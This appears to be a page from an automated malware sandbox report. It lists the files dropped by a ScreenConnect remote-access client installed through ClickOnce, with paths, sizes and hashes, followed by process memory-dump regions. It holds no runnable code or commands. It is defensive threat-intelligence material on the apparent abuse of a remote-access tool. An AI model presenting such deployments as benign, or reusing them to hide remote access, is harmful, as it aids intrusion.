22d01d7d0ced89b585c5c60858b865e03b5a0ee78601f89cb5e9dfbc428cb26774c4d46ee528fc3619fbdd748c146c9978534e6c60333ef21f7067c8a7a3ed84

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_b4e7e641e682530b.cdf-ms

Filesize
6KB

MD5
08d6df93c931ac79db3deeed71142247

SHA1
6f17839fd8ec7ad69943c661d484ef10918f9015

SHA256
282e36548f1b1e26322dd0d96d051f10c8affbfcff7602199fd5a4fbb361dd4f

SHA512
16f9e3c0319e37c84261b22e6e8a516722165e5abb5df46a801f5a29769851b4e5ecfe7fd0d60e575ae30ad1d7624d2b8317d4d341722f7cc24d3958d878d55e

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_e9b66af00cedc602.cdf-ms

Filesize
2KB

MD5
21c3e8581e0ec41845ebd4a020259737

SHA1
10b09748f8a8d269139e4eb561b3a1e7243336be

SHA256
d7ab646176056a024ad534a9bf5df3af19377c1d4c00380ed62971feaeca7052

SHA512
d0f8442c294dee362fbcc83613131fa20ff38a87c0e794989458b7843be4a369482cc61e2952620d322049c4c563cec62f021c4c326de797e7f30074db97d126

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\manifests\scre..tion_25b0fbb6ef7eb094_0018.0003_none_392be528a852386d.cdf-ms

Filesize
14KB

MD5
ca7d283decdff11c453ab400a61d0b37

SHA1
d1c8be5d78c5ffcb36ae464ebc0b361dd037bd66

SHA256
aa353ac4c4c86844bfb9904068a0ee83cce96577a9a26b7940532ff5ad2188dd

SHA512
45a8fa9389ab9f0a46e5d50c56d817fc9470837856a6d6cd8592d3488357ec5e628e82814c3d329faff16b444588f59055e28ce109d99f039d0d863af087801d

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\manifests\scre..vice_4b14c015c87c1ad8_0018.0003_none_04f4a566935dd369.cdf-ms

Filesize
4KB

MD5
304c6bea1f5ea5c5e3c516ddc9bb849e

SHA1
d79ac7bbc61d8b33e0657b5e2c5fecffa36e6849

SHA256
5d4cc57b893bb5c3577a0a2f03734820d73010155ee095039ebb994dcb7754e7

SHA512
f36eb77270c0a97200bf50caea4c7d40b0d9e1df8d1d91ab63af60d67c224e86eca42be4457c674b5203104c176ef7a7c3060254adc04dd03ea6cbf0ea827600

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\scre...exe_25b0fbb6ef7eb094_0018.0003_none_9837ab9241d36e8a\ScreenConnect.ClientService.exe

Filesize
93KB

MD5
0f80aaec2d64b7acc60dd728245c8572

SHA1
a1c756eeddbc628dfc65797d422c75678268ebcc

SHA256
eacfa86ac1c292a86c0bcf8cbb50a9d7282b11040e86f1abfb08b771761447d9

SHA512
31c61cf116dfbf7fde9362cb260236f8543fdb65be1fec178308e890fce29e19f5a3e16f142561fb446236676a23f0a229b9b72865ee0ea0b8301eb34a871ced

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\Client.en-US.resources

Filesize
48KB

MD5
d524e8e6fd04b097f0401b2b668db303

SHA1
9486f89ce4968e03f6dcd082aa2e4c05aef46fcc

SHA256
07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4

SHA512
e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\Client.it-IT.6_0.resources

Filesize
28KB

MD5
64af09a09814a820c0c30e14cb4b98e3

SHA1
d35aa1714a57df1b3b336cb7353c8b185d35cf76

SHA256
817899476929e033e18944282372ff6f998a7a7c1afea746420c7b972a085a06

SHA512
c6560a0a7cf5f994d838a8b03de95898fe8bfab216bccb1d66d976d9a6ba225b7ab53c5e89b081e278583cadbfdca5bae82d15d59ee7509f7ff66ca1b4c029c3

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\Client.resources

Filesize
26KB

MD5
5cd580b22da0c33ec6730b10a6c74932

SHA1
0b6bded7936178d80841b289769c6ff0c8eead2d

SHA256
de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

SHA512
c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\user.config

Filesize
588B

MD5
5f68cdb817e43ad2ccb92458b3def124

SHA1
d93b7afea9478612af94354709c3b9bfabdc0daa

SHA256
7ea78efcaddc2a05f8deb004036cb4e088b425b50a1d09bf1f52024c4e071de1

SHA512
3a4f75d5183adb9b181431f33831018970405716338a45dfffa5f00fdb85a28df7848c3cfd4517bf10a5fcb7d2bfece818518b7e527e3f76abdb2fc49cfbfe6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Filesize
1KB

MD5
efd934620fb989581d19963e3fbb6d58

SHA1
63b103bb53e254a999eb842ef90462f208e20162

SHA256
3af88293fb19b74f43b351ed49ccc031727f389c7ca509eece181da5763a492f

SHA512
6061817547280c5cf5d2cd50fa76b92aa9c1cfc433f17d6b545192e1098281394562adb773931cecd15d1b594d3b9c03855b70682fe6c54df5912c185b54670b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\A8PPGR2X.N2V\Q91JY3K8.B5L.application

Filesize
149KB

MD5
e656f16fa23a5d49adf49f656abeee8b

SHA1
15f7f653a903f756cbab23611e080ae9cfd78c35

SHA256
420889076237c47b2ad6e0b0b8b92a3119aa5da8a8144d8497f521b1750bfb14

SHA512
89ef6afbc464081e3f7fc341cc48c9c5d1d3a0b501b8fa7d2835507a405f37493f11b0a5716c8294aef7847975d517d1e1375f9092a519cc6d036600aa92036e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.Client.dll

Filesize
192KB

MD5
9658bd4d65b08886df1a06a108d01d53

SHA1
6ce933d2811f7966158e4c5762a95dba62138afc

SHA256
4b2c6f6a372fdea9c5b64b6e58253c1bc84831b45563d81aeee6a105f92fafca

SHA512
ebd70bdde5d80195d72a484a2daf4ac38b304c1543744189cda33beff13414a55931d42a95db63566938dc2c12aae5ba3c117ccd58f39d0d5f6810fafa442f47

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.Client.dll.genman

Filesize
1KB

MD5
40202c65564b6a6a2362193caf6a614b

SHA1
e52480496a7dcc49c16e4244a0db71eb3763efbe

SHA256
8e88511690afa71584b4b07470924b6a1493e6d4b03cb4c479ae900259598133

SHA512
dd37925793b34295eae089e4f3e2af49a95cfd84104876a03eb290d205be578745d059e891cea3339549f16954a1ac04b14d7350d23c62723e3bf5776eef54ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.ClientService.dll

Filesize
66KB

MD5
b0c45f1987bcfbbcd519d436602a4f87

SHA1
802793c2359c310253b0ba3b92625a26959da81d

SHA256
897d6a25e33722259a8a5c21be1a9676e93b03ffea7ba19b11776b788b59bd41

SHA512
4ddd2293c93c44f91757a9f754179fc949f10784b9cd1c338f3c8a747330a3b58616ec99e72ff46f613dee48c27f69a73a67bdd1016a8c45f457acda4a20238e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.ClientService.dll.genman

Filesize
1KB

MD5
73badbc06f0675f4e0b527d56ddecf15

SHA1
524e265ed1141fcba0e05f44a07d7718caf43589

SHA256
7879847a898ce315b459ba929e10ff5ae09d76a1a18fb6b1082d6732676978d6

SHA512
93129cfe338928bd7f9c657cbadca22044f22e922ee932669832760ff75b7e8e876a9e61bc2ceea8d1d82bbba3610137d6118cb470bfc2cbd8d62dc7a345d471

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.Core.dll

Filesize
536KB

MD5
b3f47c94a0fbb3429164e33d2af33026

SHA1
0ce72c05139489ac222568e372d046f031b5e751

SHA256
fd4f0f06170a4c0e75ce0ffce42d6a6557235e932aeab4ba45ebd6ee1ee5d2dc

SHA512
87e98491504d2e6264fb8f0c306a6a2ecb2062dca87dfa6aaa61e5d064bafd4ada906f05c90d83468c2cb4096df741eb76088da6d50052b3156f6dd27b097bda

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.Core.dll.genman

Filesize
1KB

MD5
4edd38c4197167454d2b142254bc92a3

SHA1
d2856f55e3c066073c40ff51dd8ebeaa9172d479

SHA256
6d88392014d038b85f0b7f2b7afd5be8ac6bf552062117439e77787e1230eb1b

SHA512
ca05b1922a743bae4a711a9c8de164190228984970b7cbbd30d93abd212a98c74d8ad01fa253dcd5e9637254f2d408cb0c63ef43b6cd2f40798304e0f0f95ca9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.Windows.dll

Filesize
1.6MB

MD5
42ce7392322ad4609a1a12122fb7a751

SHA1
9c705751d0263fc17191621602dac330a1e9a6f7

SHA256
82e2383ed29ea3cdb267ee4d6a6d63cad1009c08666f45eec8acaaad9bd4ecfe

SHA512
1cbef82040898987e0be2f35fb5e3e4e85e2ad4e3bf2e1a82f27a8635c262ac8f222ed70c2441fc8e6818317bc31d448cb8965af2bc036675d9257771ebd341e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.Windows.dll.genman

Filesize
1KB

MD5
aaa1d48a04a8788c475cd40ced26a9c7

SHA1
6d6306deec659fdab5068ac0407d99b810f0d07e

SHA256
4acdd3096517f303372cf5e4b187376a30053cc5d37c843c7debb87750956d41

SHA512
43f31cfc79dcea9e04b691c951e851f2258b65ff1db5c7eac05fa503215e14f0485b7ea88cff95aa85f850df32541002bacd40b153d1820fdd6357bba523718d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.WindowsBackstageShell.exe

Filesize
59KB

MD5
6df709fde05d66e6853dc688d24caf6d

SHA1
e6af329f22b5aca22112cf38c512e32a632b6b6a

SHA256
eb4446911424c8d8b40ccd57489d8bba6964feff5fed3e0a48e98a060244e2ea

SHA512
23cbb41cb563008a12ffbbbed433ddea934adbb44c63e72ed7dc599732f2377e26d1d1a0e37743cdd3687525f2adbedbd0ff7f929b2b536106f99a80e55c0343

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.WindowsClient.exe

Filesize
588KB

MD5
ed5001ef845f26e9fabeea06fc86a723

SHA1
8213b1d1c267a7e68122123ee3c7927dea371aed

SHA256
7f4e5114ad35a427b2327e473bc06b306cfcc55b4b9ca83eb478f02f738ecbf0

SHA512
867037aab27a783721a9d33aac3a4e181e106cf7bf1f74031809cfec08874f550c32090b814d632f976beb1cfdf708d98e356ccdff9e85497b872b2af4923fbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.WindowsClient.exe.config

Filesize
266B

MD5
728175e20ffbceb46760bb5e1112f38b

SHA1
2421add1f3c9c5ed9c80b339881d08ab10b340e3

SHA256
87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

SHA512
fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.WindowsClient.exe.genman

Filesize
2KB

MD5
9428c3d069f92ddfccf78039b3aeea03

SHA1
0d77a49d8dcce69383f2e8ef2ea269b162a7e73f

SHA256
58e6e5a2ffc59667746b498952bc92a2a2c2a0bbe1980b4e795baafb63a91198

SHA512
c0cd1e32e44d7261658b53ff74a81d631e023b2d8263557522e044236ab8fe67a8f0e8b767a2e40ebc6be7f478c35edffcb1bf0e59665f95a2bc87d728d074e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.WindowsClient.exe.manifest

Filesize
17KB

MD5
8a39299c81d6709066bfcf3c1555ed2f

SHA1
dfa220fefc3292f26514d5d846a74a25ff820794

SHA256
aedbf3676272cab2b106df5cada523e83fea51a58d2ac555ef34696755f3e52d

SHA512
05baf7d3fc4544817f5ecf56541746e0a2ebe7a3568524a992d9d999195a18373c63f1268647e945c6be25f74bf34e76e8dc78ffac165fe1b30c5f12f4fa895d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deployment\VJ35PXQ0.7X9\EXPDMEBR.6L0\ScreenConnect.WindowsFileManager.exe

Filesize
79KB

MD5
dc1b8d6843fcac9ff0aa05c6b838c770

SHA1
e6c9fe74bbbb66496facaeabcccf0969b877e039

SHA256
56354e7a05518491399b8a59b2396a02f1070cace3953c8c4bd924bdf71c044e

SHA512
75ff197b123eee755461cc1fb660132a8303ad7de9ee01b6fa567dd320b9021c3ecc345ff8391f6e0cff87810d65d200bfcb18750e7c6d4ebbdd1c2a4bbf7374

Download Submit
memory/1648-384-0x0000000004E70000-0x0000000005414000-memory.dmp

Filesize
5.6MB

Download
memory/1648-382-0x0000000004710000-0x00000000048BA000-memory.dmp

Filesize
1.7MB

Download
memory/1648-385-0x00000000046B0000-0x0000000004700000-memory.dmp

Filesize
320KB

Download
memory/1648-388-0x00000000048C0000-0x00000000048F6000-memory.dmp

Filesize
216KB

Download
memory/1648-389-0x00000000049A0000-0x0000000004A32000-memory.dmp

Filesize
584KB

Download
memory/1852-44-0x000001E4A9720000-0x000001E4A97AC000-memory.dmp

Filesize
560KB

Download
memory/1852-22-0x00007FFCC7300000-0x00007FFCC7DC1000-memory.dmp

Filesize
10.8MB

Download
memory/1852-403-0x00007FFCC7300000-0x00007FFCC7DC1000-memory.dmp

Filesize
10.8MB

Download
memory/1852-402-0x00007FFCC7303000-0x00007FFCC7305000-memory.dmp

Filesize
8KB

Download
memory/1852-1-0x000001E48B1A0000-0x000001E48B1A8000-memory.dmp

Filesize
32KB

Download
memory/1852-50-0x000001E4A99F0000-0x000001E4A9B9A000-memory.dmp

Filesize
1.7MB

Download
memory/1852-0-0x00007FFCC7303000-0x00007FFCC7305000-memory.dmp

Filesize
8KB

Download
memory/1852-38-0x000001E4A7030000-0x000001E4A7048000-memory.dmp

Filesize
96KB

Download
memory/1852-32-0x000001E4A71F0000-0x000001E4A7226000-memory.dmp

Filesize
216KB

Download
memory/1852-56-0x000001E4A9730000-0x000001E4A97C6000-memory.dmp

Filesize
600KB

Download
memory/1852-7-0x000001E4A8F80000-0x000001E4A8FD0000-memory.dmp

Filesize
320KB

Download
memory/1852-4-0x00007FFCC7300000-0x00007FFCC7DC1000-memory.dmp

Filesize
10.8MB

Download
memory/1852-3-0x00007FFCC7300000-0x00007FFCC7DC1000-memory.dmp

Filesize
10.8MB

Download
memory/1852-2-0x000001E4A57B0000-0x000001E4A5936000-memory.dmp

Filesize
1.5MB

Download
memory/3232-397-0x0000000002D30000-0x0000000002D48000-memory.dmp

Filesize
96KB

Download
memory/3332-340-0x0000000000CE0000-0x0000000000D76000-memory.dmp

Filesize
600KB

Download
memory/4440-371-0x0000000004DE0000-0x0000000004E6C000-memory.dmp

Filesize
560KB

Download
memory/4440-366-0x0000000004CC0000-0x0000000004CD8000-memory.dmp

Filesize
96KB

Download